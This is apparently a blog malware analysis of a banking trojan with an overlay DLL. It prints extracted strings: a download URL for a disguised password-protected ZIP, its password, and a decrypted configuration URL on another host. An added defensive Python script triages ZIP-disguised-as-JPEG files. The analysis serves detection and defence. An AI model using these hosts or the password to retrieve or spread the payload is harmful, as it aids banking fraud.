<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6C4qW9ZyDZweP6fstjdwx6XhHLs9I7ttchf4mEffxht_ZQF5naJvXClmwLmWr-P15bqs0ywvaI4UxseT6MJjXMUHEsurhPvetwM1eMRW18ks8pMRTADxlvlzQLmHHYkb_9emG6K51GLI/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6C4qW9ZyDZweP6fstjdwx6XhHLs9I7ttchf4mEffxht_ZQF5naJvXClmwLmWr-P15bqs0ywvaI4UxseT6MJjXMUHEsurhPvetwM1eMRW18ks8pMRTADxlvlzQLmHHYkb_9emG6K51GLI/s1600/02.jpg" height="234" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis showing a low detection rate.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE_4K8wkzJDfkRW5ekEiZRSNgYfIA6lYiiiTdqkhejUdsaH8AhpTo9X90VLbOnn5RuQO3sCuKLzg6LXip6Z0ej4WqGSLU14hsoxPZz3WlSkGX4oZBd7WnaxZueMLTNX-SdGjZWwOKml8w/s1600/vt01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE_4K8wkzJDfkRW5ekEiZRSNgYfIA6lYiiiTdqkhejUdsaH8AhpTo9X90VLbOnn5RuQO3sCuKLzg6LXip6Z0ej4WqGSLU14hsoxPZz3WlSkGX4oZBd7WnaxZueMLTNX-SdGjZWwOKml8w/s1600/vt01.jpg" height="94" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;"><br /></strong></div>
<div>
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;"><br /></strong></div>
<div>
<span style="background-color: white; text-align: start;"><div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
0049CDB4 &lt;ansistring&gt; 'olepro32.dll'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
0049E440 &lt;ansistring&gt; 'ControlData'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0B94 &lt;ansistring&gt; 'sejafeliz02'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0BA8 &lt;ansistring&gt; '\\Adobe.zip'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0BBC &lt;ansistring&gt; '\\'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0C88 &lt;pansichar&gt; ''</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DBC &lt;ansistring&gt; '\\Adobe.zip'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DD0 &lt;ansistring&gt; '\\Runner.exe'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DE4 &lt;ansistring&gt; '\\borlndmm.dll'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DFC &lt;ansistring&gt; 'http://greatsteppes.com/1/images/winrt.jpg'</div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The downloader fetches a file with a .jpg extension that is actually a password-protected ZIP.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAY5psRdURW9yJqgRHSHdkXlCd1DyA97xcIpkwgBovAYOmqIPGkS8nTPo6Y0Zktsz4cGteYc878X6aYBKuwzaH0oKtnDIy5V4V9RmKfxOk-cFZU14E8LWdAxQCb9Qp1telPQDJZ9l_hp0/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAY5psRdURW9yJqgRHSHdkXlCd1DyA97xcIpkwgBovAYOmqIPGkS8nTPo6Y0Zktsz4cGteYc878X6aYBKuwzaH0oKtnDIy5V4V9RmKfxOk-cFZU14E8LWdAxQCb9Qp1telPQDJZ9l_hp0/s1600/03.jpg" height="277" width="400" /></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">ZIP file</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> 004A0DFC &lt;ansistring&gt; 'http://greatsteppes.com/1/images/winrt.jpg'</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Password</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> 004A0B94 &lt;ansistring&gt; 'sejafeliz02'</span></div>
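<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The download described above, a ".jpg" that is really a password-protected ZIP, can be triaged without trusting the extension. The following is an added example, not the blog's own decryptor or tooling: it identifies the container by magic bytes, reads the ZIP central directory for the per-entry encryption flag, and flags executables inside. The sample bytes are constructed in memory; the entry names Runner.exe, gbsite.dll and borlndmm.dll are taken from the strings above, everything else is assumed.</span></div>

```python
"""Triage a downloaded file whose name says .jpg but whose bytes say ZIP.
Added example (not the blog's code); the sample ZIP is constructed inline."""
import struct
import zlib

ZIP_LOCAL_SIG = b"PK\x03\x04"
ZIP_CENTRAL_SIG = b"PK\x01\x02"
ZIP_EOCD_SIG = b"PK\x05\x06"
JPEG_SIG = b"\xff\xd8\xff"
FLAG_ENCRYPTED = 0x0001  # general-purpose flag bit 0: entry is password-protected

# Extensions that legitimately carry each container type (assumed list).
EXPECTED_EXT = {"zip": {"zip", "jar", "docx", "xlsx", "apk"}, "jpeg": {"jpg", "jpeg"}}
EXECUTABLE_EXT = {"exe", "dll", "cpl"}


def build_zip_blob(entries, encrypted=False):
    """Construct a minimal STORED zip in memory (constructed sample, not the
    real winrt.jpg). With encrypted=True only the flag bit is set; the data is
    not actually enciphered, which is enough to exercise the triage below."""
    local, central = bytearray(), bytearray()
    flags = FLAG_ENCRYPTED if encrypted else 0
    for name, data in entries:
        name_b = name.encode("utf-8")
        crc = zlib.crc32(data) & 0xFFFFFFFF
        offset = len(local)
        # local file header: version, flags, method, time, date, crc, sizes, name/extra len
        local += ZIP_LOCAL_SIG + struct.pack(
            "<HHHHHIIIHH", 20, flags, 0, 0, 0, crc, len(data), len(data), len(name_b), 0)
        local += name_b + data
        # central directory entry mirrors the header and records the local offset
        central += ZIP_CENTRAL_SIG + struct.pack(
            "<HHHHHHIIIHHHHHII", 20, 20, flags, 0, 0, 0, crc, len(data), len(data),
            len(name_b), 0, 0, 0, 0, 0, offset)
        central += name_b
    eocd = ZIP_EOCD_SIG + struct.pack(
        "<HHHHIIH", 0, 0, len(entries), len(entries), len(central), len(local), 0)
    return bytes(local + central + eocd)


def sniff_container(blob):
    """Identify the container by magic bytes, ignoring the file name."""
    if blob.startswith(ZIP_LOCAL_SIG):
        return "zip"
    if blob.startswith(JPEG_SIG):
        return "jpeg"
    return "unknown"


def zip_entries(blob):
    """List entries from the central directory (robust to data descriptors,
    unlike walking local headers), with the per-entry encryption flag."""
    eocd = blob.rfind(ZIP_EOCD_SIG, max(0, len(blob) - 65557))
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    _, _, _, total, _cd_size, cd_offset, _ = struct.unpack_from("<HHHHIIH", blob, eocd + 4)
    entries, pos = [], cd_offset
    for _ in range(total):
        if not blob.startswith(ZIP_CENTRAL_SIG, pos):
            raise ValueError("corrupt central directory")
        f = struct.unpack_from("<HHHHHHIIIHHHHHII", blob, pos + 4)
        flags, method, usize, nlen, elen, clen = f[2], f[3], f[8], f[9], f[10], f[11]
        name = blob[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        entries.append({"name": name, "size": usize, "method": method,
                        "encrypted": bool(flags & FLAG_ENCRYPTED)})
        pos += 46 + nlen + elen + clen
    return entries


def triage(filename, blob):
    """Compare the declared extension with the real container and summarise."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = sniff_container(blob)
    report = {"declared": ext, "actual": actual,
              "mismatch": actual != "unknown" and ext not in EXPECTED_EXT[actual],
              "entries": [], "any_encrypted": False, "executables": []}
    if actual == "zip":
        report["entries"] = zip_entries(blob)
        report["any_encrypted"] = any(e["encrypted"] for e in report["entries"])
        report["executables"] = [e["name"] for e in report["entries"]
                                 if e["name"].lower().rsplit(".", 1)[-1] in EXECUTABLE_EXT]
    return report


# Constructed sample modelled on the download described above: a ".jpg" that is
# really a password-protected zip carrying the banker's components.
SAMPLE_ENTRIES = [
    ("Runner.exe", b"MZ" + b"\x00" * 30),
    ("gbsite.dll", b"MZ" + b"\x00" * 30),
    ("borlndmm.dll", b"MZ" + b"\x00" * 30),
]


def run_sample():
    return triage("winrt.jpg", build_zip_blob(SAMPLE_ENTRIES, encrypted=True))


if __name__ == "__main__":
    r = run_sample()
    print(f"declared .{r['declared']} but bytes are {r['actual']} (mismatch={r['mismatch']})")
    for e in r["entries"]:
        print(f"  {e['name']:<14} {e['size']:>5} bytes  encrypted={e['encrypted']}")
    print("executables inside:", r["executables"])
```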
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-HShEnjodMwC86DhcEMCIrYy1WxCzteGrWyN3Q4ABpFx5NS1-bC7xMFJFpX2t9dFoktU3DiGLVkuqS7enr-CPoRuFeJOYMVyYQZ0WUxc6R1jve5MNI3sxW5ch2mUSMDwIoSnDdVgGyVQ/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-HShEnjodMwC86DhcEMCIrYy1WxCzteGrWyN3Q4ABpFx5NS1-bC7xMFJFpX2t9dFoktU3DiGLVkuqS7enr-CPoRuFeJOYMVyYQZ0WUxc6R1jve5MNI3sxW5ch2mUSMDwIoSnDdVgGyVQ/s1600/04.jpg" height="153" width="320" /></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">We analyze runner.exe and gbsite.dll, which are the malicious payloads, the latter in particular.</span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iyXLp8TvJWV9DKI3IooB2CtfCcyfVTN3iadUYO9UhC6FOVpDyji6iTmTjXVR8rUA8yEhBlxhhfHWacD_rPKBRnuQA2DLHgyvKWj8n2a9F5MVDYKq3LP7NjBXU4IcWQfIgd6EDbX3RBQ/s1600/vt02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iyXLp8TvJWV9DKI3IooB2CtfCcyfVTN3iadUYO9UhC6FOVpDyji6iTmTjXVR8rUA8yEhBlxhhfHWacD_rPKBRnuQA2DLHgyvKWj8n2a9F5MVDYKq3LP7NjBXU4IcWQfIgd6EDbX3RBQ/s1600/vt02.jpg" height="142" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHf_QX8yUZzUP4NPwlWyu29iTj4-UtYl9iMPOQrUgBIFxKtPTD0HNlrYGeI0ZzkPQGM9-3XJJGhBO3hHAbdFqIDdJ-GWc2uQZVwLa8cQ4cwtKY_kDb-oh3DWlHfDEbGdNlORHHw2mFKAI/s1600/vt03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHf_QX8yUZzUP4NPwlWyu29iTj4-UtYl9iMPOQrUgBIFxKtPTD0HNlrYGeI0ZzkPQGM9-3XJJGhBO3hHAbdFqIDdJ-GWc2uQZVwLa8cQ4cwtKY_kDb-oh3DWlHfDEbGdNlORHHw2mFKAI/s1600/vt03.jpg" height="190" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analyzing the DLL and looking at its forms, it is clearly a screen overlay.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYckojnRYKji3TKdIbEi1GTWMwg3HoKjBqsMrKm9iTsnPOvAG5fsgzAdB-9EIoB5AC_WRVj6h_iPC0fI9MQb_gb1J5_5kQGHzvs9pM3Eqkmsn3RVXJ6fHZVivmym6iuZ6REGQYy4sBZrg/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYckojnRYKji3TKdIbEi1GTWMwg3HoKjBqsMrKm9iTsnPOvAG5fsgzAdB-9EIoB5AC_WRVj6h_iPC0fI9MQb_gb1J5_5kQGHzvs9pM3Eqkmsn3RVXJ6fHZVivmym6iuZ6REGQYy4sBZrg/s1600/01.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzwrsa_Jz3W69E0nBND7eTTo0dETr-XMU0zQE4IgH0r6h5ASk3aklNe0hSWarwrmyyWXdVoJ90beOtDVo9j8jyU7dY5qdZOATB5Ygm4NOuuyrdkbUqKCeFW3VTJIgntVdKxHtnAFxTUis/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzwrsa_Jz3W69E0nBND7eTTo0dETr-XMU0zQE4IgH0r6h5ASk3aklNe0hSWarwrmyyWXdVoJ90beOtDVo9j8jyU7dY5qdZOATB5Ygm4NOuuyrdkbUqKCeFW3VTJIgntVdKxHtnAFxTUis/s1600/02.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9TgAMjE_XMXIRL8RGFiR81tzDvVTNC30-3p9PSmWvqhqR-3iyM77IApNkEwd_jHSCMgQsbHWlDzs3PAHPH-nadDGkfXUBpfTxsxQIRPTzmdmG6BZ5bgy3KSeImG3qhQ-WLDX0dfQFDlU/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9TgAMjE_XMXIRL8RGFiR81tzDvVTNC30-3p9PSmWvqhqR-3iyM77IApNkEwd_jHSCMgQsbHWlDzs3PAHPH-nadDGkfXUBpfTxsxQIRPTzmdmG6BZ5bgy3KSeImG3qhQ-WLDX0dfQFDlU/s1600/04.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaLGJFF8Kqcu9cCQIcd1VbvjHG-ICXntyb0SVtX8XHzqiBFPyl9SBaQFIM-cMTWuqqkZpVOCKw3vyLhXb3IHYGwL3_akqhQfBQCG3QgO8GLvm2Rabk4G1GxtHe0Ari8q-JU6Pz23qsx7E/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaLGJFF8Kqcu9cCQIcd1VbvjHG-ICXntyb0SVtX8XHzqiBFPyl9SBaQFIM-cMTWuqqkZpVOCKw3vyLhXb3IHYGwL3_akqhQfBQCG3QgO8GLvm2Rabk4G1GxtHe0Ari8q-JU6Pz23qsx7E/s1600/05.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXJPYI1JMjT1d-ZVYYthTsbBRtEHrYoYJwwyPtpnc6Vz46ZFjFYQXkANN136LKu_XJoNnNmZvzJxEGvCDHDA9sJFIXeXbQSLKn-ZxjmIQ4oOxG07SLGRny70i4U0NyOW3HGzOyBN3nu6s/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXJPYI1JMjT1d-ZVYYthTsbBRtEHrYoYJwwyPtpnc6Vz46ZFjFYQXkANN136LKu_XJoNnNmZvzJxEGvCDHDA9sJFIXeXbQSLKn-ZxjmIQ4oOxG07SLGRny70i4U0NyOW3HGzOyBN3nu6s/s1600/06.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjscLWHWSgpRTo_oXplUHZ8VLjdBmpaWGzIdJVwNBkcrfG70sfucmQf4_gfPo-eDD3iTKUszY1Mj2bAZdz9bu0Cly30_ZGoF1EOhB2z7-Brg65VU_NOUFIsCkid4xDc1PF4rKSelQF7Gro/s1600/07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjscLWHWSgpRTo_oXplUHZ8VLjdBmpaWGzIdJVwNBkcrfG70sfucmQf4_gfPo-eDD3iTKUszY1Mj2bAZdz9bu0Cly30_ZGoF1EOhB2z7-Brg65VU_NOUFIsCkid4xDc1PF4rKSelQF7Gro/s1600/07.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5GnCS1IHoZM3O9VVbzisuQbP4c0Z1NZ9GP2ullcSYOBvFX6qrJ2d864oiYxCpcF5U9mqvc3v95-7JBmAFo6zR8wLFC8cpk3zOCB6z5V46nUjz6JW-HQKWEAEOH9UT2tLJhZbtFNvnCs0/s1600/08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5GnCS1IHoZM3O9VVbzisuQbP4c0Z1NZ9GP2ullcSYOBvFX6qrJ2d864oiYxCpcF5U9mqvc3v95-7JBmAFo6zR8wLFC8cpk3zOCB6z5V46nUjz6JW-HQKWEAEOH9UT2tLJhZbtFNvnCs0/s1600/08.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirEwBslq64-WGSHxyFW6AX64Q2lD3V9J0v-qCjqAm7yuYytx4GuY4sbMwWxjot_CobeWz_gO6nDIwlUp6KTQA9PQJA1PctxjxcQnDfbQxcnX57L0n8gBQ9hN7u0YwVEXrxTJDDosneAY4/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirEwBslq64-WGSHxyFW6AX64Q2lD3V9J0v-qCjqAm7yuYytx4GuY4sbMwWxjot_CobeWz_gO6nDIwlUp6KTQA9PQJA1PctxjxcQnDfbQxcnX57L0n8gBQ9hN7u0YwVEXrxTJDDosneAY4/s1600/09.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghHpn0e_ou7rvce3k65L6sQAXxIntzI-bgGAzUKQ1iQvd9cF7O5wKvEGOrf2zh4aKE0e73mzwRNvEdqfnDNarQY4eW4GIxj5X40QKJLI8rBtTceR0t_zgQRi4RrwVdnaYfuNH1WX3nu-A/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghHpn0e_ou7rvce3k65L6sQAXxIntzI-bgGAzUKQ1iQvd9cF7O5wKvEGOrf2zh4aKE0e73mzwRNvEdqfnDNarQY4eW4GIxj5X40QKJLI8rBtTceR0t_zgQRi4RrwVdnaYfuNH1WX3nu-A/s1600/10.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0t4GSwtt5IPIogP1-uZ0RZ06YXQ7o3A9pBMQQBHXx-bmlVWBtTxssVjcmTnlDJkRFWRDC9X1_ZfO2sLrmNt1nCSBiKEBItPQiD4i2fB_I4A5gZSSTQeVM02iAtt5Oug8qArEtnJ0B5dc/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0t4GSwtt5IPIogP1-uZ0RZ06YXQ7o3A9pBMQQBHXx-bmlVWBtTxssVjcmTnlDJkRFWRDC9X1_ZfO2sLrmNt1nCSBiKEBItPQiD4i2fB_I4A5gZSSTQeVM02iAtt5Oug8qArEtnJ0B5dc/s1600/11.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfcNJgyzlWI8scRH3NqaVCAzNP6NsuKkMXEJ7p6dplPQGns7VlLp3-NeyJ1SbVy4gkxzfhHLF8id-dAUPG7kJnRf366hhPMzlb3mxfaiDJshIYwAy3T17TAFvEBcGsqMiJ7_Z2wmoiazA/s1600/12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfcNJgyzlWI8scRH3NqaVCAzNP6NsuKkMXEJ7p6dplPQGns7VlLp3-NeyJ1SbVy4gkxzfhHLF8id-dAUPG7kJnRf366hhPMzlb3mxfaiDJshIYwAy3T17TAFvEBcGsqMiJ7_Z2wmoiazA/s1600/12.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh04E2N5Ggi9T-JHWquOBfPr_J2Y-jc1t9rCOePXqSqO1bWgakVUyiatFvZ3xAoA1f0tp3xBVTR7OgvEa_pRM8L-35aHuQdQpXBFYyvHFDPbIkYEp3XMGuTDxA04Ixhej1AESx3C6ucQ_w/s1600/14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh04E2N5Ggi9T-JHWquOBfPr_J2Y-jc1t9rCOePXqSqO1bWgakVUyiatFvZ3xAoA1f0tp3xBVTR7OgvEa_pRM8L-35aHuQdQpXBFYyvHFDPbIkYEp3XMGuTDxA04Ixhej1AESx3C6ucQ_w/s1600/14.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_xWsR4XaHHXy3iZlfjVmwg1TygWi2lLulTUGIuHofBR8j28-HHXn9a5Y_8J7MHiR3DZyMcqT7SEHaBgJnIuQWGy40H_ebb7X45yrpjIQKSSckMzbzMmaDaW-mItWaJ6ON6igBAh4TV2Y/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_xWsR4XaHHXy3iZlfjVmwg1TygWi2lLulTUGIuHofBR8j28-HHXn9a5Y_8J7MHiR3DZyMcqT7SEHaBgJnIuQWGy40H_ebb7X45yrpjIQKSSckMzbzMmaDaW-mItWaJ6ON6igBAh4TV2Y/s1600/15.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsKImt8CNKero0rgb4lurqBYOQwdo-CJYOp7ziWOE-FEgxTY7jvJtTRpGLoK84c3Y64eUWVl-e1aMBx0faDi5UP7liK7kPHGm1NslO8RZvei4a946CPBWl4w8wEwRphi94VriFYnYP-Z0/s1600/17.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsKImt8CNKero0rgb4lurqBYOQwdo-CJYOp7ziWOE-FEgxTY7jvJtTRpGLoK84c3Y64eUWVl-e1aMBx0faDi5UP7liK7kPHGm1NslO8RZvei4a946CPBWl4w8wEwRphi94VriFYnYP-Z0/s1600/17.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSJXRgaTM1Yy_WhEskeES9SDCELFrGyC3KIy3gFXq6v_XdEnealgU5wkNnOdCtSkx7Hg3N1q6oD1rHUbYFd4P91cv7UVIJlmO2Fw5pWNu9cLH_ibNxlKqkUA8QuKiHALlthRY03inN2Y/s1600/18.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSJXRgaTM1Yy_WhEskeES9SDCELFrGyC3KIy3gFXq6v_XdEnealgU5wkNnOdCtSkx7Hg3N1q6oD1rHUbYFd4P91cv7UVIJlmO2Fw5pWNu9cLH_ibNxlKqkUA8QuKiHALlthRY03inN2Y/s1600/18.jpg" height="280" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWK30gGN8L36b1Fr_ha8MA-9BSeHAbSJJCZxmULHq_ce6RD-6hG-6-gpegehFD5SZNksP0Zm1MdKxSsm9indbTdhBmVpnb2HvCU2x1AiSJ5MPE5Oo1b6kCffC-A_K_qtuKHGZdu17k6M/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWK30gGN8L36b1Fr_ha8MA-9BSeHAbSJJCZxmULHq_ce6RD-6hG-6-gpegehFD5SZNksP0Zm1MdKxSsm9indbTdhBmVpnb2HvCU2x1AiSJ5MPE5Oo1b6kCffC-A_K_qtuKHGZdu17k6M/s1600/3.png" height="280" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Obfuscated data.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00A56C34 &lt;ustring&gt; 'A948E60138382B1833D80D55FA31F229BD1425DE45E919C2D5698FBC74F222DA74EE6EEF02'</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It decrypts to:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://bandaluxuria.net/blog/upa.inf</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">At this URL there is a configuration file for the trojan</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
